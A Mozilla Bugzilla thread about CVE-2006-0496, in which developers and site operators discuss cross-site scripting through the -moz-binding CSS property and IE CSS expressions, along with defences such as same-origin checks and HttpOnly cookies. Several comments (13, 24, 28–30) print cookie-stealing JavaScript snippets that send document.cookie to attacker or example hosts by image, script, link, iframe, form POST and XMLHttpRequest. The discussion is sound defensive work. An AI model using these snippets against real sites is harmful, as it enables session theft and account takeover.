Bug 324253 - CVE-2006-0496 Do something about the XSS issues -moz-binding introduces
Status: RESOLVED FIXED
Whiteboard: [sg:want P4] IE has similar issues wh...
Product: Core
Classification: Components
Component: XBL
Version: Trunk
Platform: x86 All
Importance: -- major with 14 votes
Assigned To: Nobody; OK to take it and work on it
URL: http://www.davidpashley.com/cgi/pyblo...
Duplicates: 361554 425095
Depends on:
Blocks: xss CVE-2008-5503
Reported: 2006-01-21 09:57 PST by Chris Thomas (CTho) [formerly cst@andrew.cmu.edu cst@yecc.com]
Modified: 2009-09-18 14:56 PDT
CC: 63 users


Attachments
cookie-reading XBL (983 bytes, text/xml) -- 2006-01-21 15:48 PST, Daniel Veditz [:dveditz]
cookie-reading behavior (IE) (512 bytes, text/plain) -- 2006-01-21 15:58 PST, Daniel Veditz [:dveditz]
exploit (load from another domain) from ydnar (699 bytes, text/html) -- 2006-01-21 16:06 PST, Daniel Veditz [:dveditz]
css with expression (IE) (134 bytes, text/css) -- 2006-01-22 22:16 PST, Daniel Veditz [:dveditz]
expression XSS exploit (IE) (693 bytes, text/html) -- 2006-01-22 22:19 PST, Daniel Veditz [:dveditz]

Description Chris Thomas (CTho) [formerly cst@andrew.cmu.edu cst@yecc.com] 2006-01-21 09:57:50 PST
From the URL:
"Late last week we became aware that it was possible to use the "-moz-binding" CSS attribute within Mozilla and Mozilla Firefox to execute arbitrary offsite JavaScript. As this attribute is designed to allow attaching an XBL transform and JavaScript to any node within the DOM, it is quite easy to use in a malicious fashion. We immediately altered our cleaner to strip this attribute from entries and comments, though also realized that wasn't even half the battle."
Comment 1 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-21 10:07:00 PST
Do what something?  Disallow binding of XBL via CSS?  That's the only thing that would help the Livejournal folks.
Comment 2 David Baron :dbaron: ⌚️UTC-7 (review requests must explain patch) 2006-01-21 10:17:10 PST
Do a same-origin check based on the location of the XBL?
Comment 3 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-21 10:27:32 PST
That would break an actual desired use case of XBL, which is allowing people to host "packages" of some sort that other people use, no?
Comment 4 Daniel Veditz [:dveditz] 2006-01-21 15:48:34 PST
Created attachment 209238 [details]
cookie-reading XBL
Comment 5 Daniel Veditz [:dveditz] 2006-01-21 15:58:04 PST
Created attachment 209240 [details]
cookie-reading behavior (IE)
Comment 6 Daniel Veditz [:dveditz] 2006-01-21 16:06:43 PST
Created attachment 209241 [details]
exploit (load from another domain) from ydnar

Load this testcase from another domain, in both Firefox and IE. In IE the behavior is blocked, in Firefox it still works. For "another domain" you can use the IP address of bugzilla, or the true hostname (currently https://recluse.mozilla.org)
Comment 7 Daniel Veditz [:dveditz] 2006-01-21 16:29:12 PST
(In reply to comment #3)
> [A same-origin check] would break an actual desired use case of XBL, which is
> allowing people to host "packages" of some sort that other people use, no?

Desired by whom? It sounds nice in theory, but no site with anything of even slight value would rely on external scripts outside their control. Even ignoring the security aspects, no one's going to want the correct functioning of their site to depend on a 3rd party not breaking something.

I can see possibilities of a CPAN-like package repository, but as a distributor for locally-hosted bindings, not their live host.

The one realistic use-case might be a corporate style repository, which could perhaps be handled through document.domain.

Bindings do more than run scripts; we might not have to ban remote XBL outright if we can disable the scripts or prevent them from accessing anything outside the binding itself.
Comment 8 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-21 16:34:40 PST
Note that there has been a good deal of discussion on cross-domain application of XBL in netscape.public.mozilla.xbl over the last few months.
Comment 9 Jesse Ruderman 2006-01-21 16:48:32 PST
> In IE the behavior is blocked, in Firefox it still works.

Under what conditions does IE block behaviors?  Whenever the CSS is on a different domain than the page?  Whenever the .htc file is on a different domain than the page?
Comment 10 Jesse Ruderman 2006-01-21 16:50:41 PST
Could we give sites a way to opt in or opt out of XBL when they link to stylesheets?  e.g. <link rel="stylesheet xbl"> or <link rel="stylesheet noxbl">.  Perhaps it could default to allowed for same-site stylesheets and disallowed for off-site stylesheets.
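A tiny sketch of what that markup might look like (both rel values are hypothetical; nothing here is implemented):

    <!-- off-site stylesheet the page explicitly trusts to attach XBL -->
    <link rel="stylesheet xbl" type="text/css" href="http://widgets.example/lib.css">

    <!-- user-controlled stylesheet that must never attach XBL -->
    <link rel="stylesheet noxbl" type="text/css" href="http://userstyles.example/theme.css">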
Comment 11 dolphinling 2006-01-21 23:42:18 PST
Another major case here is the many sites that don't link to stylesheets, but let you type out <style> tags yourself. To properly protect those, (the ones that don't even know XBL exists and therefore don't know to filter it,) XBL would have to be entirely disallowed in that type of stylesheet.

Is that a case we're going to try to do something about, or are we going to say "they _can_ filter it, so it's their problem"?
Comment 12 Benjamin Smedberg [:bsmedberg] 2006-01-22 06:21:55 PST
Can style itself cause XSS attacks through javascript: URIs?
Comment 13 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-22 09:27:38 PST
Yes, of course.  With bug 33961 and bug 302618 fixed, something like:

data:text/html,<div style="background: url('javascript:alert(document.cookie)')">

alerts an empty cookie... but of course if it were in a LiveJournal page it would alert the actual cookie.

Note the argument between dbaron and brendan about the whole javascript: thing in bug 33961...
Comment 14 David Baron :dbaron: ⌚️UTC-7 (review requests must explain patch) 2006-01-22 10:16:06 PST
Did you test it?  All I get is
  Error: uncaught exception: Permission denied to get property Window.alert

And even if I didn't get a permission error, what global object would said javascript: URL have access to?
Comment 15 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-22 10:30:06 PST
> Did you test it?

Yes, of course...  I do seem to get inconsistent results in different builds; the alert worked fine in a 2006-01-18-05 build.  The same build with a different profile gives the security exception you cited, however.  The profile I was using doesn't have any prefs set that would loosen this security restriction that I can think of; I'll try to narrow down what the key difference between the two profiles is.

> And even if I didn't get a permission error, what global object would said
> javascript: URL have access to?

The one that lives in the docshell that the loadgroup involved belongs to.  See the patch that fixed bug 302618.
Comment 16 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-22 10:38:18 PST
Ah, I see the difference.  You have to load the data: URI into a brand-new window or tab that's had nothing loaded in it before; then the alert works.  I can confirm that putting that HTML into an actual file and loading the file:// URI gives a security exception.
Comment 17 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-22 10:46:00 PST
Ah, so what's saving us is the code at http://lxr.mozilla.org/seamonkey/source/dom/src/jsurl/nsJSProtocolHandler.cpp#245 (and the special-casing of about:blank there is what let my original data: URI work).  OK, good.  ;)
Comment 18 bradfitz 2006-01-22 11:51:20 PST
Hello, this is Brad Fitzpatrick from LiveJournal.

Just to clear up any confusion:  we do have a very strict HTML sanitizer.  But we made the decision (years ago) to allow users to host CSS files offsite because... why not?  It's just style declarations, right?

But then came along behavior, expression, -moz-binding, etc, etc...

Now CSS is full of JavaScript.  Bleh.

But Internet Explorer has two huge advantages over Mozilla:

-- HttpOnly cookies (Bug 178993), which LiveJournal sponsored for Mozilla, over a year ago.  Still not in tree.

-- same-origin restrictions, so an offsite behavior/binding can't mess with the calling node's DOM/Cookies/etc.

Either one of these would've saved our ass.

Now, I understand the need to innovate and add things like -moz-binding, but please keep in mind the authors of webapps who are fighting a constant battle to improve their HTML sanitizers against new features which are added to browsers.

What we'd REALLY love is some document meta tag or HTTP response header that declares the local document safe from all external scripts.  HttpOnly cookies are such a beautiful idea, we'd be happy with just that, but Comment 10 is also a great proposal... being able to declare the trust level, effectively, of external resources.  Then our HTML cleaner would just insert/remove the untrusted/trusted, respectively.

Thanks for discussing this.  I'm following with much interest.
Comment 19 Six Apart, Ltd. 2006-01-22 12:01:32 PST
(from ydnar@sixapart.com)

+1 on privilege reduction, whether it's an HTTP header, meta/other tag in <head> or a link rel.  Even if Mozilla didn't support HttpOnly cookies, if there was a header that effectively disabled read access to document.cookie, it would be as effective.

If Moz & Microsoft can agree on SSL/anti-phishing policy and an RSS icon, is consensus on scripting security policy too hard to imagine?
Comment 20 Brendan Eich [:brendan] 2006-01-22 13:14:53 PST
(In reply to comment #19)
> If Moz & Microsoft can agree on SSL/anti-phishing policy

Don't believe MS blog spin.  Because we are participating with other browser vendors and CAs in some meetings does not mean that we will do whatever MS proposes, and it's misleading to imply that some sort of shared standard for new SSL UI exists yet.  We have not agreed with MS to do anything for either SSL or anti-phishing, and what MS proposes to do looks to me like a bad idea.

> and an RSS icon,

In contrast to SSL/anti-phishing, that was not a case of agreement on something new, rather of Firefox spreading an image that was being used freely on websites to mean "RSS spoken here" -- a _de facto_ standard.

HttpOnly is an analogous case but with IE leading the way, and I personally think we should support it.  But note that it doesn't solve everything.  See bug 178993 comment 47.

> is consensus on scripting security policy too hard to imagine?

Talk is cheap.  Let's get back to the bug, and put the advocacy elsewhere.

/be
Comment 21 Daniel Veditz [:dveditz] 2006-01-22 22:16:59 PST
Created attachment 209329 [details]
css with expression (IE)
Comment 22 Daniel Veditz [:dveditz] 2006-01-22 22:19:58 PST
Created attachment 209330 [details]
expression XSS exploit (IE)
Comment 23 Jesse Ruderman 2006-01-22 22:39:49 PST
The last attachment works cross-domain for me in IE.
Comment 24 Daniel Veditz [:dveditz] 2006-01-22 22:49:35 PST
(In reply to comment #18)
> But Internet Explorer has two huge advantages over Mozilla:
> -- same-origin restrictions, so an offsite behavior/binding can't mess with
> the calling node's DOM/Cookies/etc.

That's true for behaviors but not, apparently, expressions. In IE
- load this bug as https://recluse.mozilla.org/show_bug.cgi?id=324253
  (hostname may differ in the future) 
- get some cookies, cut and paste the following into the address bar:
  javascript:document.cookie='foo=blah';void(0);
- load the expression XSS exploit attachment

The external bugzilla.m.o expression can see the recluse.m.o cookies and affect the DOM. Expressions appear to be somewhat fragile (variants on this testcase failed or sometimes caused IE to hang), so it may not be possible to write a complex enough script as an expression to get around httpOnly cookies.
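For anyone who hasn't seen an expression()-based payload, an illustrative example of the general shape (this is made up for the purpose of the comment, not the actual attachment; the logging host is hypothetical):

    /* IE-only: expression() evaluates arbitrary JScript whenever the style is recomputed */
    body {
      background-color: expression(
        window.__sent ? "white"
                      : (window.__sent = true,
                         new Image().src = "http://attacker.example/log?" + document.cookie,
                         "white")
      );
    }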

> I understand the need to innovate and add things like -moz-bindings, but please
> keep in mind the authors of webapps which are fighting a constant battle

When we add potentially dangerous new features we ought to require webpages to affirmatively assert they want to use them in a new meta tag or processing instruction in the <head> section. Sites that are using the features can easily flip the switch, and sites that aren't aware of the security implications don't have to worry about getting blindsided, possibly by features that didn't exist when the site was written.
Comment 25 Martin Atkins 2006-01-26 10:42:02 PST
I think an obvious solution for implementing origin restrictions on XBL while
still allowing the use of off-site component libraries is to give off-site
XBL bindings access only to the magic internal DOM created by the XBL scripts
and to the elements in the "real" DOM that descend from the element with the
binding. This way the component can do what it likes to itself but can't affect
the containing document and, most importantly, it can't get at the "document"
object in order to get the cookies out of it.

Of course, not being familiar with how Mozilla's security model operates, I
can't really comment on how feasible such granular restrictions are within
the DOM. Hopefully someone can enlighten me.
Comment 26 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-26 10:45:03 PST
At the moment such restrictions are impossible.  The security model would have to be rearchitected completely to allow it.  See the discussion on this that already happened in n.p.m.xbl.
Comment 27 Juha-Matti Laurio 2006-02-01 18:50:53 PST
A FrSIRT advisory has been assigned for this issue:
http://www.frsirt.com/english/advisories/2006/0403
Comment 28 Yuriy Krylov 2006-02-02 07:25:59 PST
What are the possible attack vectors for this vulnerability?

It seems that the hacker has to obtain knowledge of the server-side code in order to exploit the -moz-binding property.  Even if the hacker can force some cookie-sniffing code to be executed on a victim's client, how can this sensitive information be relayed to the hacker?

One line of thinking is executing an XMLHttpRequest POST, something like:

function postToEvilServer(data, element)
   {
    // evilElement, evilURL, evilMode and displayStatus are assumed to be
    // defined elsewhere on the attacker's object
    this.evilElement.innerHTML = 'About to send your cookie data to '+this.evilURL+' via '+this.evilMode+' method!';
    try {
     netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
     xmlhttp = new XMLHttpRequest();
     xmlhttp.onreadystatechange=displayStatus;
     xmlhttp.open(this.evilMode,this.evilURL,true);
     xmlhttp.send(data);
    } catch(e) {
     this.evilElement.innerHTML = e;
    }
   }

Unless the hacker is relaying information to the same domain (is this what LiveJournal is worried about?), Mozilla should throw "Permission denied to call method XMLHttpRequest.open" without the netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead"); call. Then there is the signed.applets.codebase_principal_support runtime property which, if set to false, will disallow UniversalBrowserRead privileges with the error: "A script from 'http://${victim_host}' was denied UniversalBrowserRead privileges."

If signed.applets.codebase_principal_support is set to true, Mozilla will still prompt the user with "A script from ${host} is requesting enhanced abilities that are UNSAFE and could be used to compromise your machine or data".  The user is given the choice to Allow or Deny, as well as to remember the decision.

It seems that a lot of mistakes have to be made by the user to allow cookie info to go out across a domain.

Again this is just one attack vector, what is missing in this analysis?  Thanks very much for your feedback!
Comment 29 Alex Kapranoff 2006-02-02 07:37:25 PST
(In reply to comment #28)
> to exploit the -moz-binding property.  Even if the hacker can force some
> cookie-sniffing code to be executed on a victim's client how can this sensitive
> information be relaid to the hacker?

E.g., we have perfectly working images.

function steal_cookie()
{
  // an_img and evil_url are assumed to be defined elsewhere
  an_img.src = evil_url + '?' + document.cookie;
}
Comment 30 Six Apart, Ltd. 2006-02-02 10:48:40 PST
There are plenty of ways a script can send (and receive) data from a webpage:

* the aforementioned new Image() method

* creating script nodes:
    var s = document.createElement( "script" );
    s.setAttribute( "type", "text/javascript" );
    s.setAttribute( "src", "http://www.example.com/dump?" + document.cookie );
    document.getElementsByTagName( "head" )[ 0 ].appendChild( s );

* creating link nodes:
    var s = document.createElement( "link" );
    s.setAttribute( "type", "text/css" );
    s.setAttribute( "rel", "stylesheet" );
    s.setAttribute( "href", "http://www.example.com/dump?" + document.cookie );
    document.getElementsByTagName( "head" )[ 0 ].appendChild( s );

* creating iframes:
    var s = document.createElement( "iframe" );
    s.style.position = "absolute";
    s.style.left = s.style.top = "-1px";
    s.style.width = s.style.height = "0";
    s.style.border = "0";
    s.setAttribute( "src", "http://www.example.com/dump?" + document.cookie );
    document.body.appendChild( s );

* creating an iframe and then POSTing data to it:
    (as above)
    s.setAttribute( "name", "__exploit" );
    var f = document.createElement( "form" );
    f.setAttribute( "action", "http://www.example.com/dump" );
    f.setAttribute( "method", "post" );
    f.setAttribute( "target", "__exploit" );
    var i = document.createElement( "input" );
    i.setAttribute( "type", "hidden" );
    i.setAttribute( "name", "cookie" );
    i.setAttribute( "value", document.cookie );
    f.appendChild( i );
    document.body.appendChild( f );
    f.submit();

* create iframe, write a shell document to it with a foreign stylesheet,
  and read data back from the foreign server by walking the iframe's DOM
Comment 31 Yuriy Krylov 2006-02-02 11:48:00 PST
Thanks very much for these!

(In reply to comment #30)
> There are plenty of ways a script can send (and receive) data from a webpage:
> [...]

Comment 32 Brendan Eich [:brendan] 2006-02-02 12:10:38 PST
(In reply to comment #26)
> At the moment such restrictions are impossible.  The security model would have
> to be rearchitected completely to allow it.  See the discussion on this that
> already happened in n.p.m.xbl.

"Rearchitected completely" is too strong.  The JS engine has the necessary hooks, but we don't implement them for all objects that may be connected by edges in the DOM, only for articulation points such as windows, and for certain hard cases.  We suspect the costs of the current CAPS implementation would go up unacceptably too, if we started using it across more edges.  But this could be optimized again.

We should talk more about this elsewhere.  What Martin Atkins proposed is clean in concept, at least so far -- if someone sees a hole in the idea, please speak up.  If the problems we associate with it have only to do with implementation hardship, we can redesign and optimize over time to make it work securely and efficiently.

/be
Comment 33 Yuriy Krylov 2006-02-02 16:47:42 PST
Brendan - what is the best way/place to continue this discussion? Thanks for your help!

All - from my own tests, without resorting to disabling JavaScript, image src injection seems to be the only exploit with a workaround:

network.image.imageBehavior set to 1 to allow image loads from the originating domain only
dom.disable_image_src_set set to true to disable all JavaScript manipulation of img src
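In user.js form, a sketch of those two preferences (names and meanings as described above):

    // workaround prefs from the two lines above
    user_pref("network.image.imageBehavior", 1);   // 1 = only load images from the originating server
    user_pref("dom.disable_image_src_set", true);  // true = scripts may not change an image's src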

Are there similar workarounds for the other scenarios mentioned by Six Apart and Alex? Beyond phishing, how else can an exploit be exercised by a malicious entity?
Comment 34 Benjamin Smedberg [:bsmedberg] 2006-11-22 11:22:24 PST
*** Bug 361554 has been marked as a duplicate of this bug. ***
Comment 35 Ted Kandell 2007-03-19 20:50:48 PDT
Here's something else to consider when attempting to "fix" this bug by restricting XBL script execution to the same domain as the originating page:

There is a legitimate use of cross-site scripting when altering a page source by injecting an off-site script using Greasemonkey. Greasemonkey's GM_xmlhttpRequest() allows Greasemonkey scripts to take advantage of AJAX across sites to create mixed-site content webpages. The page source can also be altered to insert CSS (stylesheets) and scripts that originate off-site as well. 

This is actually rather critical for a particular application that I'm developing. I have a very large image map, with about 3500 'area' tags, where only those that have an "alt" attribute (about 2000) have to be modified to insert a mouseover event handler. One way of doing this is to run an XPath query and get a result set, and iterate over each of these areas to insert an "onmouseover" attribute. (Adding an event handler as a function reference to each area won't work, because Greasemonkey runs in a sandbox and the runtime script functions / method references aren't available to the Greasemonkey script when it executes "onload".) Adding these "onmouseover"s takes about 3 minutes on each page load (with the largest possible image map, on the initial results page) partly because these have to be added individually using a setTimeout() so that the browser doesn't lock up while executing this loop.

Cross-site XBL scripting nicely solves this problem. The same added cross-site stylesheet that gets added by the Greasemonkey script also adds a behavior (referencing an off-site XBL file) to these 2000 elements with the selector "area[alt]" upon the final page initialization after the Greasemonkey script exits. What are added are mouseover events that are merely function references, and instead of taking minutes to add all of them, adding these to the DOM area elements happens practically instantaneously. (These mouseovers in turn add a sizable amount of data in the form of attributes to each area element as needed, which is taken from an over 1Mb JSON file which basically functions as a substitute for a database table. This means that all the separate data is integrated into the original page without any noticeable delay for the end-user, on the first mouseover of each area element - the only data that gets added to the page is that which the user actually accesses as needed, which will be generally only a few of the 2000 area elements.) 
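(Roughly, the injected stylesheet contains a rule of this shape; the selector is quoted from the paragraph above, while the binding fragment id is hypothetical:)

    area[alt] {
      -moz-binding: url("http://members.cox.net/tkandell/mtDNA/roots/snps.xml#area-hover");
    }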

I can see this becoming critical for many Greasemonkey and AJAX applications that need to alter large numbers of elements on very large webpages. This doesn't just include adding event handlers, but fields as well, since it isn't possible to retrieve additional data joined with an element at runtime via a cross-site AJAX call - that is without running a separate server as a proxy which assembles the data behind the scenes before the page is served.

Altering webpages within the browser using Greasemonkey is really the only workaround for the legitimate cross-site restriction on XMLHttpRequest calls. 
Remember that the end-user is the one that actively installs Greasemonkey scripts, and is always able to see and read the source for themselves - and that these scripts are generally hosted on open-source sites, where they can be examined by everyone (e.g. userscripts.org). Therefore it's rather difficult (at least up until now) to publicly post a malicious or deceptive Greasemonkey script without being detected and personally held responsible. A very different situation from the typical anonymous cross-site scripting attack.

It is indeed true that XBL itself was designed to enable other sites to add data and functionality to existing webpages, and not just to pages in the same domain. This is also the definition of cross-site scripting - so it seems, as has been mentioned, that the very design of XBL contains what could be described as a "security flaw". 

Is there any way to maintain this separation of data, presentation, and functionality while maintaining security? Think of the day that's coming soon where there will only be XML files, representing just data without any presentation whatsoever (Service Oriented Architecture / SOA) that originate all over (even now there are RSS feeds which are exactly that), CSS files to provide the presentation for the XML data, and XBL files to add behaviors to these data elements and create new widgets using XUL and SVG. How can we get to the point of this sort of code and data reuse with same-domain restrictions?

Can anyone give examples of sites and pages that do just that, that integrate large XML remote files / RSS feeds and present them without any HTML at all, just using CSS / XBL / XUL / SVG? I'd like other folks to comment on how a cross-site XBL restriction would affect their sites that follow this architecture.

I can think of one possible suggestion to improve security:
A sort of prompt by the browser to "allow cross-site scripting" for a given domain on another domain, similar to prompting for permission to "install software" or allow popups, that adds that site / site combination to a whitelist. These too are potentially dangerous actions that at times need to be allowed for certain particular sites. Also, think of the way that NoScript allows scripts on webpages originating from certain domains and not others. 

Could this sort of whitelist also ease the restriction on cross-domain XMLHttpRequest calls as well? What do people think of this idea?

The Greasemonkey script, which is rather complex, lives at:
http://userscripts.org/scripts/show/7101

The relevant JS, CSS, and XBL files are at:
http://members.cox.net/tkandell/mtDNA/roots/snps.css
http://members.cox.net/tkandell/mtDNA/roots/snps.xml
http://members.cox.net/tkandell/mtDNA/roots/snps.js
http://members.cox.net/tkandell/mtDNA/roots/crs.js






(This is still in beta and may at times be broken, but after running this script 
Comment 36 :Gavin Sharp [email: gavin@gavinsharp.com] 2008-03-25 17:31:41 PDT
*** Bug 425095 has been marked as a duplicate of this bug. ***
Comment 37 Boris Zbarsky [:bz] (Out June 25-July 6) 2009-02-08 07:05:17 PST
We do a same-origin check on XBL loads now.  See bug 379959.
